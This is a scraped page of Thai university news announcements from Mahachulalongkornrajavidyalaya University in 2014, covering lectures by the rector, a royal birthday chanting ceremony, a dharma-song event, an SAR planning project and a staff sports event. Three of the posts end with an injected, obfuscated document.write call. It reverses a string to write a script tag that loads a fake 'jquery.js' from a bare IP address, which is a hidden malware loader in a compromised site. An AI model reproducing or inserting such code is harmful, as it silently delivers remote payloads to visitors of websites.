พระพรหมบัณฑิต,ศ.ดร. อธิการบดี มจร ปาฐกถาพิเศษ เรื่อง “ภาษาไทยกับการเผยแผ่พระพุทธศาสนา”

ขอเชิญชวนร่วมงานกิจกรรมเสริมหลักสูตร เสวนาทางวิชาการ โดยพระพรหมบัณฑิต,ศ.ดร. อธิการบดี มจร ปาฐกถาพิเศษ เรื่อง "ภาษาไทยกับการเผยแผ่พระพุทธศาสนา" และมีการเสวนาทางวิชาการเรื่อง ศิลปะการใช้ภาษาไทยสู่เส้นทางวิชาชีพ โดย กวีซีไรต์ชื่อดัง ๒ ท่านได้เเก่ ไพวรินทร์ ขาวงาม และ แดนอรัญ แสงทอง ปิดท้ายด้วย ทศพล หิมพานต์ ศิลปินลูกทุ่งชื่อดัง เเหล่สด ในวันที่ ๒๔ กุมภาพันธ์...

พระพรหมบัณฑิต อธิการบดี มจร ได้พบปะนิสิตปฏิบัติธรรม

วันนี้ ๒๕ ธันวาคม ๒๕๕๗ เวลา ๑๓.๐๐ น. พระพรหมบัณฑิต อธิการบดี มจร ได้พบปะนิสิต และกล่าวให้โอวาทแก่นิสิตซึ่งปฏิบัติธรรมอยู่ ณ อาคารหอประชุม มวก. ๔๘ พรรษา มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย อยุธยา document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

การสั่งซื้อเสื้อเหลืองเพื่อใส่ตลอดเดือนธันวาคม

สามารถอ่านรายละเอียดการสั่งซื้อได้ที่ >>  การสั่งซื้อเสื้อเหลือง document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

พิธีเจริญพระพุทธมนต์เฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว เนื่องในโอกาสเฉลิมพระชนมพรรษา ๘๗ พรรษา ๕ ธันวามหาราช ประจำปี ๒๕๕๗

กำหนดการ พิธีเจริญพระพุทธมนต์เฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว เนื่องในโอกาสเฉลิมพระชนมพรรษา ๘๗ พรรษา ๕ ธันวามหาราช ประจำปี ๒๕๕๗ วันจันทร์ที่ ๑ ธันวาคม พ.ศ. ๒๕๕๗ เวลา ๑๓.๐๐-๑๕.๐๐ น. ณ อาคาร มวก. ๔๘ พรรษา มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ตำบลลำไทร อำเภอวังน้อย จังหวัดพระนครศรีอยุธยา ------------------------ เวลา ๑๒.๓๐ น.    ผู้บริหาร คณาจารย์ เจ้าหน้าที่ นิสิตทุกรูป/คน ลงนามถวายพระพรพระบาทสมเด็จ...

ผ่าเพลง ผ่าธรรม นวัตกรรมรูปแบบใหม่ทางวิชาการ

สมาคมศิษย์เก่า มจร จัดงานผ่าเพลงผ่าธรรม นวัตกรรมรูปแบบใหม่ทางวิชาการ ( ครั้งที่ ๑) โดยมี ผศ.ดร.สมศักดิ์  บุญปู่ เป็นประธานเปิดงาน มีผู้บริหารคณาจารย์เข้าร่วมงานเป็นจำนวนมาก เช่น พระราชวรเมธี รองอธิการบดีฝ่ายบริหาร พระราชวรมุนี รองอธิการบดีฝ่ายกิจการนิสิต พระเมธีธรรมาจารย์ รองอธิการบดีฝ่ายประชาสัมพันธ์เเละเผยเเผ่ พระคูปริยัตกิตติธำรงค์ คณบดีคณะสังคมศาสตร์ พระครูปลัดมารุต วรมงฺคโลคณบดีคณะครุศาสตร์, พระมหาโชว์ ทสฺสนีโย ผู้อำนวยการสำนักส่งเสริมพระพุทธศาสนาและบริการสังคม และมีนักร้องที่มีชื่อเสียงเข้าร่วมร้องเพลงที่มีเนื้อหาธรรมะมากมายมาร่วมงาน เช่น พันตรีสุธี สุขสากล เป็นต้น ในวันที่...

นิมนต์/เรียนเชิญ ทุกท่านร่วมฟังการสัมมนาวิชาการทางพุทธจิตวิทยา เรื่อง “พุทธจิตวิทยาเพื่อพัฒนาชีวิต”

โดยพระเดชพระคุณพระพรหมบัณฑิต ศ.ดร. อธิการบดี มจร ตั้งเเต่เวลา ๑๓.๐๐ - ๑๖.๐๐ น. และพระมหาอ้าย ธีรปญฺโญ,ดร. บรรยายพิเศษเรื่อง ความหมาย และความสำคัญของสถานที่ประสูติ ตรัสรู้ ปฐมเทศนา และปรินิพพานที่ส่งผลต่อพุทธจิตวิทยา ตั้งเเต่เวลา ๐๙.๐๐ - ๑๑.๓๐ น. ในวันเสาร์ที่ ๑๕ พฤศจิกายน พ.ศ. ๒๕๕๗ ณ ห้องประชุม ๔๐๑ อาคารสำนักงานอธิการบดี มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย...

Project Brainstorming for make developing plan and writing SAR โครงการ ระดมความคิดเพื่อจัดทำแผนพัฒนาและเขียน SAR

 โครงการ ระดมความคิดเพื่อจัดทำแผนพัฒนาและเขียน SAR จัดโดย  คณะสังคมศาสตร์ ร่วมกับหน่วยวิทยบริการคณะสังคมศาสตร์ พระครูปริยัติกิตติธำรง, ผศ.ดร. คณบดีคณะสังคมศาสตร์ เป็นประธานในพิธีเปิดพร้อมกล่าวให้โอวาทเเก่ผู้เข้าร่วมโครงการ ผศ.ดร.สุระพล สุยะพรหม รองอธิการบดีฝ่ายกิจการทั่วไป บรรยายพิเศษเรื่อง “การบูรณาการหน่วยงาน เพื่อเตรียมความพร้อมรองรับการประกันคุณภาพการศึกษาในระดับหลักสูตร”  โครงการ ระดมความคิดเพื่อจัดทำแผนพัฒนาและเขียน SAR จัดโดย  คณะสังคมศาสตร์ ร่วมกับหน่วยวิทยบริการคณะสังคมศาสตร์ พระครูปริยัติกิตติธำรง, ผศ.ดร. คณบดีคณะสังคมศาสตร์ เป็นประธานในพิธีเปิดพร้อมกล่าวให้โอวาทเเก่ผู้เข้าร่วมโครงการ ผศ.ดร.สุระพล สุยะพรหม รองอธิการบดีฝ่ายกิจการทั่วไป บรรยายพิเศษเรื่อง “การบูรณาการหน่วยงาน เพื่อเตรียมความพร้อมรองรับการประกันคุณภาพการศึกษาในระดับหลักสูตร”   และมี ผศ.ปราณี  พรรณวิเชียร...

ขอเชิญบุคลากรเข้าร่วมโครงการส่งเสริมสุขภาพและศักยภาพการปฏิบัติงานของบุคลากร มจร. อโศกเกมส์ ครั้งที่ ๙

ขอเชิญบุคลากรเข้าร่วมโครงการส่งเสริมสุขภาพและศักยภาพการปฏิบัติงานของบุคลากร  มจร. อโศกเกมส์ ครั้งที่ ๙ ณ โรงเรียนวัดไร่ขิงวิทยา ตำบลไร่ขิง อ.สามพราน จ.นครปฐม ระหว่างวันที่ ๗-๙ พฤศจิกายน ๒๕๕๗ Download กำหนดการ Download แผนที่สถานที่แข่งขัน Download ตารางการแข่งขัน document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))
X